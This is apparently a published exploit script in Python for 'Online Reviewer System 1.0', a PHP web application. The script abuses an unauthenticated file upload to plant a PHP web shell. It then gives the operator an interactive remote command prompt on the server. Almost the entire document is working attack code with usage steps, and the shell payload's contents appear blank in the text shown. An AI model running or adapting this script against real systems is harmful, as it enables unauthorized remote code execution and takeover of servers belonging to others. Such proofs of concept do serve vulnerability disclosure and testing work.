# Exploit Title: Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Exploit Author: Abdullah Khawaja # Date: 2021-09-21 # Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/reviewer_0.zip # Version: 1.0 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 # Description: Online Reviewer System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # RCE via executing exploit: # Step 1: run the exploit in python with this command: python3 ORS_v1.0.py # Step 2: Input the URL of the vulnerable application: Example: http://localhost/reviewer/ import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL print(Style.BRIGHT+" Online Reviewer System 1.0") print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) print(header) print(r""" ______ _______ ________ ___ //_/__ /_______ ___ _______ ______(_)_____ _ __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ /___/ abdullahkhawaja.com """) GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults # proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") def webshell(LINK, session): try: WEB_SHELL = LINK+'/system/system/admins/assessments/databank/files/'+filename getdir = {'cmd': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {'cmd': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) #Creating a PHP Web Shell phpshell = { 'personImage': ( 'kh4waja.php', '', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'difficulty_id':'1', 'test_desc':'CIVIL ENGINEERING', 'test_desc':'CIVIL ENGINEERING', 'test_subject':'Mathematics, Surveying and Transportation Engineering', 'description':'Hello World', 'option_a':'a', 'option_b':'b', 'option_c':'c', 'option_d':'d', 'answer':'A', 'btnAddQuestion':'Save' } filename = 'kh4waja.php' #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'system/system/admins/assessments/databank/btn_functions.php?action=add', cookies=cookies, files=phpshell, data=data) shell_upload = True if("" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) #Executing The Webshell webshell(LINK, s)